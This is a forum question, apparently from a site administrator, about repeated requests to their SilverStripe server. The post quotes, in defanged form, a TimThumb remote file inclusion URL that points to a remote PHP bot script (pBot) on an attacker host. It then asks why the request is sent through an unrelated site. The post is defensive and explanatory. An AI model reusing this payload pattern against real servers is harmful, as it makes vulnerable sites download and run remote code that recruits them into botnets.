My server (mediaquarter.at) is currently being DDoSed by requests like this (with some minor variations): hXXp://www.mediaquarter.at/http://www.madeineurope.org.uk/media/functions/timthumb/timthumb.php?src=http://blogger.com.midislandrental.com/.mods/sh.php (URL "deactivated" so no one can accidentally click it)
Beware if you try to download the referenced PHP file: In the preg_replace there's the /e switch activated and the code contains multiple eval statements - clean that up before you want to take a look at it! Looks like pBot, you can find more information about it here: http://www.offensivecomputing.net/?q=node/1417
TimThumb is vulnerable to remote file inclusion (http://eromang.zataz.com/2011/09/20/wordpress-timthumb-rfi-vulnerability-used-as-botnet-recruitment-vector/) - seems to be pretty widespread in WordPress. So I would understand somebody calling hXXp://www.madeineurope.org.uk/media/functions/timthumb/timthumb.php?src=http://blogger.com.midislandrental.com/.mods/sh.php to exploit the vulnerability.
However, what's the point of trying to call it via another website (mediaquarter.at), which only results in a 404 error message? Additionally my server isn't running WordPress, but SilverStripe instead so this seems to be pretty pointless.
Is this just an error / stupid on the attacker's side or am I overlooking some kind of attack vector here?
PS: The server is just some cheap web hosting and I can't reach it at all, so I'm not able to verify if there are any changes on the system.